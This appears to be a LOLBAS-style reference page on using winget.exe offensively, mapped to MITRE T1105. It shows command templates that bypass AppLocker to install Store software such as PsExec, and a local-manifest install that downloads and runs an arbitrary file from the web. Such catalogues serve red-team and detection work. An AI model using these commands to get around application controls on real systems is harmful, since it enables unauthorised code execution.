🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸͺŸ LOLBAS / winget.exe

winget.exe

Windows Package Manager tool

AWL Bypass

Download and install software from Microsoft Store, even if Microsoft Store App is blocked, and AppLocker is activated on the machine

winget.exe install --accept-package-agreements -s msstore {name or ID}

Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine, and even if AppLocker is active on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this. — MITRE: T1105 — Privileges: User

Download

Download and install software from Microsoft Store, even if Microsoft Store App is blocked

winget.exe install --accept-package-agreements -s msstore {name or ID}

Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this. — MITRE: T1105 — Privileges: User

Execute

Download and execute an arbitrary file from the internet

winget.exe install --manifest {PATH:.yml}

Downloads a file from the web address specified in .yml file and executes it on the system. Local manifest setting must be enabled in winget for it to work: `winget settings --enable LocalManifestFiles` — MITRE: T1105 — Privileges: Local Administrator - required to enable local manifest setting